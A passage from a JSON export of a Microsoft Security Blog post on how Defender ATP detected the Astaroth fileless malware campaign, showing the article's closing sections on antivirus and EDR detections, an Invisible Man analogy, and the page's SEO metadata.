loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"382\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png\" alt=\"screenshot\" class=\"wp-image-89619\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center-300x287.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"382\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png\" alt=\"Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack\" class=\"wp-image-89620\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center-300x287.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 4. Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The rest of Microsoft Defender ATP&#8217;s capabilities beyond Antivirus enable security operations teams to detect and remediate fileless threats and other attacks. Notably, Microsoft Defender ATP <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/microsoft-defender-atp\/overview-endpoint-detection-response\">endpoint detection and response<\/a> (EDR) has strong and durable detections for fileless and living-off-the-land techniques across the entire attack chain.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"534\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP.png\" alt=\"screenshot\" class=\"wp-image-89617\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP-225x300.png 225w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"534\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP.png\" alt=\"Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities\n\n\" class=\"wp-image-89618\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP-225x300.png 225w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 5. Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We also published a <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/microsoft-defender-atp\/threat-analytics\">threat analytics<\/a> report on living-off-the-land binaries to help security operations assess organizational security posture and resilience against these threats. New Microsoft Defender ATP services like <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/02\/microsofts-threat-vulnerability-management-now-helps-thousands-of-customers-to-discover-prioritize-and-remediate-vulnerabilities-in-real-time\/\">threat and vulnerability management<\/a> and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/02\/28\/announcing-microsoft-threat-experts\/\">Microsoft Threat Experts<\/a> (managed threat hunting), further assist organizations in defending against fileless threats.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Through signal-sharing and orchestration of threat remediation across Microsoft\u2019s security technologies, these protections are further amplified in <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/technology\/threat-protection\">Microsoft Threat Protection<\/a>, Microsoft\u2019s comprehensive security solution for the modern workplace. For this Astaroth campaign, Office 365 Advanced Threat Protection (<a href=\"https:\/\/docs.microsoft.com\/en-us\/office365\/securitycompliance\/office-365-atp\">Office 365 ATP<\/a>) detects the emails with malicious links that start the infection chain.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/en-us\/security\/technology\/threat-protection\">Microsoft Threat Protection<\/a> secures identities, endpoints, email and data, apps, and infrastructure.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion-fileless-threats-are-not-invisible\">Conclusion: Fileless threats are not invisible<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To come back to one of my original points in this blog post, being fileless doesn\u2019t mean being invisible; it certainly doesn\u2019t mean being undetectable.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">An analogy: Pretend you are transported to the world of H.G. Wells\u2019 <a href=\"https:\/\/en.wikipedia.org\/wiki\/The_Invisible_Man\">The Invisible Man<\/a> and can render yourself invisible. You think, great, you can walk straight into a bank and steal money. However, you soon realize that things are not as simple as they sound. When you walk out in the open and it\u2019s cold, your breath\u2019s condensation gives away your position; depending on the type of the ground, you can leave visible footmarks; if it\u2019s raining, water splashing on you creates a visible outline. If you manage to get inside the bank, you still make noise that security guards can hear. Motion detection sensors can feel your presence, and infrared cameras can still see your body heat. Even if you can open a safe or a vault, these storage devices may trigger an alert, or someone may simply notice the safe opening. Not to mention that if you somehow manage to grab the money and put them in a bag, people are likely to notice a bag that\u2019s walking itself out of the bank.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Using invisible techniques and being actually invisible are two different things. Using advanced technologies, Microsoft Defender ATP exposes fileless threats like Astaroth before these attacks can cause more damage.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><em>Andrea Lelli<\/em><\/strong><br><em>Microsoft Defender ATP Research<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"talk-to-us\">Talk to us<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Questions, concerns, or insights on this story? Join discussions at the&nbsp;<a href=\"https:\/\/techcommunity.microsoft.com\/t5\/Windows-Defender-Advanced-Threat\/ct-p\/WindowsDefenderAdvanced\">Microsoft Defender ATP community<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Follow us on Twitter <a href=\"https:\/\/twitter.com\/MsftSecIntel\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>@MsftSecIntel<\/strong><\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Advanced technologies in Microsoft Defender ATP&#8217;s Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory <\/p>\n","protected":false},"author":68,"featured_media":89711,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ms_queue_id":[],"ep_exclude_from_search":false,"_classifai_error":"","_classifai_text_to_speech_error":"","_alt_title":"","ms-ems-related-posts":[85438,90776,89915],"footnotes":""},"post_tag":[3921],"threat-intelligence":[3727],"content-type":[3663],"job-role":[],"product":[],"topic":[3687],"coauthors":[1968],"class_list":["post-89592","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-living-off-the-land","threat-intelligence-attacker-techniques-tools-and-infrastructure","content-type-research","topic-threat-intelligence","review-flag-1694638265-576","review-flag-1-1694638265-354","review-flag-2-1694638266-864","review-flag-3-1694638266-241","review-flag-4-1694638266-512","review-flag-5-1694638266-171","review-flag-6-1694638266-691","review-flag-7-1694638266-851","review-flag-lever-1694638263-909","review-flag-man-1694638264-816","review-flag-new-1694638263-340"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Dismantling a fileless campaign: Microsoft Defender ATP&#039;s Antivirus exposes Astaroth attack | Microsoft Security Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Dismantling a fileless campaign: Microsoft Defender ATP&#039;s Antivirus exposes Astaroth attack | Microsoft Security Blog\" \/>\n<meta property=\"og:description\" content=\"Advanced technologies in Microsoft Defender ATP&#039;s Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"Microsoft Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-08T16:00:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-21T22:06:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Microsoft Defender Security Research Team\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Microsoft Defender Security Research Team\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"},\"author\":[{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/windows-defender-research\/\",\"@type\":\"Person\",\"@name\":\"Microsoft Defender Security Research Team\"}],\"headline\":\"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack\",\"datePublished\":\"2019-07-08T16:00:51+00:00\",\"dateModified\":\"2025-12-21T22:06:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"},\"wordCount\":2104,\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"keywords\":[\"Living off the land\"],\"articleSection\":[\"AI and machine learning\",\"Cybersecurity\",\"Endpoint security\",\"Security Intelligence\",\"Security intelligence\",\"Threat protection\",\"Windows Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\",\"name\":\"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"datePublished\":\"2019-07-08T16:00:51+00:00\",\"dateModified\":\"2025-12-21T22:06:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"width\":440,\"height\":268},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"name\":\"Microsoft Security Blog\",\"description\":\"Expert coverage of cybersecurity topics\",\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\",\"name\":\"Microsoft Security Blog\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"width\":512,\"height\":512,\"caption\":\"Microsoft Security Blog\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/060b835777058efc81d6828a64820f98\",\"name\":\"Microsoft Security Threat Intelligence - Editor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g52243f56b7f8688616d4ca12dc0148e2\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g\",\"caption\":\"Microsoft Security Threat Intelligence - Editor\"},\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/eravena\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","og_locale":"en_US","og_type":"article","og_title":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog","og_description":"Advanced technologies in Microsoft Defender ATP's Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory","og_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","og_site_name":"Microsoft Security Blog","article_published_time":"2019-07-08T16:00:51+00:00","article_modified_time":"2025-12-21T22:06:33+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png","type":"image\/png"}],"author":"Microsoft Defender Security Research Team","twitter_card":"summary_large_image","twitter_image":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png","twitter_misc":{"Written by":"Microsoft Defender Security Research Team","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#article","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"},"author":[{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/windows-defender-research\/","@type":"Person","@name":"Microsoft Defender Security Research Team"}],"headline":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack","datePublished":"2019-07-08T16:00:51+00:00","dateModified":"2025-12-21T22:06:33+00:00","mainEntityOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"},"wordCount":2104,"publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","keywords":["Living off the land"],"articleSection":["AI and machine learning","Cybersecurity","Endpoint security","Security Intelligence","Security intelligence","Threat protection","Windows Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","name":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","datePublished":"2019-07-08T16:00:51+00:00","dateModified":"2025-12-21T22:06:33+00:00","breadcrumb":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","width":440,"height":268},{"@type":"BreadcrumbList","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/"},{"@type":"ListItem","position":2,"name":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack"}]},{"@type":"WebSite","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","name":"Microsoft Security Blog","description":"Expert coverage of cybersecurity topics","publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization","name":"Microsoft Security Blog","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","width":512,"height":512,"caption":"Microsoft Security Blog"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/060b835777058efc81d6828a64820f98","name":"Microsoft Security Threat Intelligence - Editor","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g52243f56b7f8688616d4ca12dc0148e2","url":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g","caption":"Microsoft Security Threat Intelligence - Editor"},"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/eravena\/"}]}},"bloginabox_animated_featured_image":null,"bloginabox_display_generated_audio":false,"distributor_meta":false,"distributor_terms":false,"distributor_media":false,"distributor_original_site_name":"Microsoft Security Blog","distributor_original_site_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog","push-errors":false,"_links":{"self":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/users\/68"}],"replies":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/comments?post=89592"}],"version-history":[{"count":2,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592\/revisions"}],"predecessor-version":[{"id":144649,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592\/revisions\/144649"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media\/89711"}],"wp:attachment":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media?parent=89592"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/post_tag?post=89592"},{"taxonomy":"threat-intelligence","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/threat-intelligence?post=89592"},{"taxonomy":"content-type","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/content-type?post=89592"},{"taxonomy":"job-role","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/job-role?post=89592"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/product?post=89592"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.microsoft.com\/en